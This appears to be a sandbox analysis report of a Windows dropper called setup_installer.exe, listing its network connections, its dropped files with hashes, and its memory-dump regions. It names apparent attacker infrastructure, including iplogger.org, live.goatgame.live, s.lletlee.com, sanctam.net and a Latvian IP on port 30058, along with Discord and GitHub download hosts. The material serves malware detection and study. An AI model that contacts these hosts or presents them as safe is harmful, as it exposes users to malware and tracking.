NL 37.0.8.235:80 tcp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 lenak513.tumblr.com udp
US 74.114.154.22:443 lenak513.tumblr.com tcp
US 8.8.8.8:53 22.154.114.74.in-addr.arpa udp
US 8.8.8.8:53 113.132.67.172.in-addr.arpa udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 s.lletlee.com udp
US 74.114.154.22:443 lenak513.tumblr.com tcp
US 74.114.154.22:443 lenak513.tumblr.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 s.lletlee.com udp
NL 52.142.223.178:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 s.lletlee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 s.lletlee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 s.lletlee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 iplogger.org udp
US 104.21.4.208:443 iplogger.org tcp
US 104.21.4.208:443 iplogger.org tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
N/A 224.0.0.251:5353 udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 093083fdf334a5df443ff99547828ae3
SHA1 850820ccb5dac80a488fda6314d2c9608665d28f
SHA256 c5ad98b39662604374e6bb3062d3074fbb3aeb019ae618e3432a4a20bd15df96
SHA512 1ef373ca706f2126cf92a6161453092450438dc505d4e2070f6f1709b39b3d93f12ec375219d781a8ce006fbfa10542581f642c63d8753675734256f7f38527d

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 994d04287d79729d0d51755455ccac6c
SHA1 155bdf22c7e3dbc44095c3183a097898a788dfbc
SHA256 a787d7498fe858f2e24f7084720cee0fefb0630244962eae897f5bc0877e054c
SHA512 a50211ae1cfede7c55e7117555efa1753cd6c75400a743e86352b1f757a7ac65285523a7ba8611a3ffc4338c27ee10fe89f8bb3746bd14968152d1d9d6fa2563

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 3cbb17dd1b89c5e7b56450e0d8b2c448
SHA1 8f0319862c3dcd567fb9f8ff725d8fc4bab87dd3
SHA256 7ff88838f8958378526b4150d40cb4de26470e3fa1990c838a689a5172b00681
SHA512 62998f303ae386c28bfbecb4558c6b46400327369551b69f59dacb7b32b491889ffec840d100b0dc4d75bffe4f07bad3dd72b5436c404b07ebfcff70f7424faf

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe

MD5 22aedcbfd9a9fa6ecdc6ab3023758197
SHA1 3c9355a168b79559e5e72408ff3648f7908b87b5
SHA256 d9588ce55ad638cb03668b358d4040385e70512ca487279c3852450e421b0107
SHA512 42e4d05565fc366d486a619657f8549beb9d9b4c799451657654dcdb955f304c061d7a3fef8e3ebedaa6e1b6dffa0c93d1fac7040c0ad415dfd2abacbef29ee6

memory/2544-43-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2544-48-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2544-54-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4408-84-0x00000000002D0000-0x00000000002D8000-memory.dmp

memory/2220-109-0x0000000000D30000-0x0000000000D5E000-memory.dmp

memory/2220-116-0x00007FFB38B90000-0x00007FFB39651000-memory.dmp

memory/2220-114-0x00000000014F0000-0x00000000014F6000-memory.dmp

memory/2220-118-0x0000000001500000-0x0000000001522000-memory.dmp

memory/4368-120-0x0000000073000000-0x00000000737B0000-memory.dmp

memory/2220-123-0x0000000001520000-0x0000000001526000-memory.dmp

memory/4896-121-0x0000000005D10000-0x0000000005DAC000-memory.dmp

memory/4896-122-0x0000000073000000-0x00000000737B0000-memory.dmp

memory/4896-125-0x0000000005B10000-0x0000000005B20000-memory.dmp

memory/2220-133-0x000000001BAF0000-0x000000001BB00000-memory.dmp

memory/3856-142-0x0000000000AD0000-0x0000000000AE0000-memory.dmp

memory/3716-152-0x0000000002260000-0x0000000002344000-memory.dmp

memory/4368-154-0x0000000073000000-0x00000000737B0000-memory.dmp

memory/1032-158-0x0000000000400000-0x000000000334B000-memory.dmp

memory/4940-166-0x0000000000400000-0x00000000004E4000-memory.dmp

memory/2784-169-0x0000000000400000-0x00000000032F8000-memory.dmp

memory/2544-172-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2544-173-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2544-179-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2544-178-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/3856-176-0x00007FFB38B90000-0x00007FFB39651000-memory.dmp

memory/2544-175-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2544-170-0x0000000000400000-0x0000000000A11000-memory.dmp

memory/2784-141-0x00000000001C0000-0x00000000001C9000-memory.dmp

memory/2784-137-0x0000000003420000-0x0000000003520000-memory.dmp

memory/1032-135-0x0000000003420000-0x00000000034BD000-memory.dmp

memory/1032-134-0x00000000035C0000-0x00000000036C0000-memory.dmp

memory/4408-124-0x000000001AFF0000-0x000000001B000000-memory.dmp

memory/4896-119-0x0000000005A50000-0x0000000005A5A000-memory.dmp

memory/4896-117-0x00000000059B0000-0x0000000005A42000-memory.dmp

memory/4896-115-0x0000000005F60000-0x0000000006504000-memory.dmp

memory/4896-113-0x0000000000FB0000-0x00000000010F2000-memory.dmp

memory/4896-180-0x0000000003210000-0x0000000003222000-memory.dmp

memory/4408-108-0x00007FFB38B90000-0x00007FFB39651000-memory.dmp

memory/4368-106-0x0000000000940000-0x0000000000A2E000-memory.dmp

memory/2544-53-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2544-52-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2544-51-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2544-50-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2544-49-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2544-46-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2544-47-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2544-45-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2544-44-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2544-42-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libstdc++-6.dll

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe

MD5 0c1daf8441a91d34da49707c8aee0902
SHA1 cb5e5ccfaf253ab657f23b2c18f9061997f380d9
SHA256 df9d05706f4169d2ba56250751d9a5233bb3aa7909cdc15a5ea4ae528e74dc29
SHA512 f68ccdef48a7af745297d9150cffa9937a2282c66ff6d37023dd8cd2225f740bf051b11e7af156f15219b9dc11f7df6babd8f1a9de619724212d74cbf11acd84

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe

MD5 a58f43f901088dfa7576e1976c85eccb
SHA1 3883572f5370f0e96f089ce94813d7d852c224de
SHA256 019f2db0c2bfce02d7710e4d540b755d580d7b65a51b85761cef08f75d0f674f
SHA512 203702cc19d43b4ebcb0be7b78e7690b10be6f168528cfde7d2f63fca51233eded1093e4f968ac0ef2b9814343314f0caf4737e328c4ee07c5a17d57a18a5357

memory/4408-190-0x000000001AFF0000-0x000000001B000000-memory.dmp

memory/3856-192-0x0000000001900000-0x000000000190E000-memory.dmp

memory/3856-194-0x000000001CFD0000-0x000000001CFE0000-memory.dmp

memory/3856-193-0x00000000030E0000-0x00000000030F2000-memory.dmp

memory/3956-207-0x00007FFB38B90000-0x00007FFB39651000-memory.dmp

memory/3856-208-0x00007FFB38B90000-0x00007FFB39651000-memory.dmp

memory/4896-209-0x000000000BE80000-0x000000000BF0C000-memory.dmp

memory/4896-210-0x000000000E010000-0x000000000E02E000-memory.dmp

memory/4896-215-0x0000000073000000-0x00000000737B0000-memory.dmp

memory/4120-217-0x00000000059F0000-0x0000000006008000-memory.dmp

memory/4120-220-0x0000000005440000-0x0000000005452000-memory.dmp

memory/1060-226-0x00000000050E0000-0x0000000005116000-memory.dmp

memory/4120-227-0x00000000054E0000-0x000000000551C000-memory.dmp

memory/1060-228-0x00000000057D0000-0x0000000005DF8000-memory.dmp

memory/3956-230-0x00007FFB38B90000-0x00007FFB39651000-memory.dmp

memory/1060-235-0x0000000005FA0000-0x0000000006006000-memory.dmp

memory/1060-241-0x0000000006010000-0x0000000006076000-memory.dmp

memory/4120-246-0x0000000005800000-0x000000000590A000-memory.dmp

memory/1060-247-0x00000000062F0000-0x0000000006644000-memory.dmp

memory/1060-249-0x0000000006670000-0x000000000668E000-memory.dmp

memory/1060-234-0x0000000005E00000-0x0000000005E22000-memory.dmp

memory/4120-231-0x00000000056E0000-0x00000000056F0000-memory.dmp

memory/4120-229-0x0000000005520000-0x000000000556C000-memory.dmp

memory/1060-225-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/1060-222-0x0000000073000000-0x00000000737B0000-memory.dmp

memory/4120-216-0x0000000073000000-0x00000000737B0000-memory.dmp

memory/1060-283-0x000000007FB70000-0x000000007FB80000-memory.dmp

memory/1060-295-0x0000000006C30000-0x0000000006C4E000-memory.dmp

memory/1060-297-0x0000000007880000-0x0000000007923000-memory.dmp

memory/1060-296-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/1060-285-0x00000000739B0000-0x00000000739FC000-memory.dmp

memory/1060-284-0x0000000007640000-0x0000000007672000-memory.dmp

memory/4120-211-0x0000000000400000-0x000000000041E000-memory.dmp

memory/3752-398-0x0000000002670000-0x0000000002690000-memory.dmp

memory/3752-397-0x0000000140000000-0x0000000140786000-memory.dmp

memory/3752-401-0x0000000140000000-0x0000000140786000-memory.dmp

memory/3752-403-0x0000000140000000-0x0000000140786000-memory.dmp

memory/3752-404-0x0000000140000000-0x0000000140786000-memory.dmp

memory/3752-402-0x0000000140000000-0x0000000140786000-memory.dmp

memory/3752-399-0x0000000140000000-0x0000000140786000-memory.dmp

memory/3752-395-0x0000000140000000-0x0000000140786000-memory.dmp

memory/3752-393-0x0000000140000000-0x0000000140786000-memory.dmp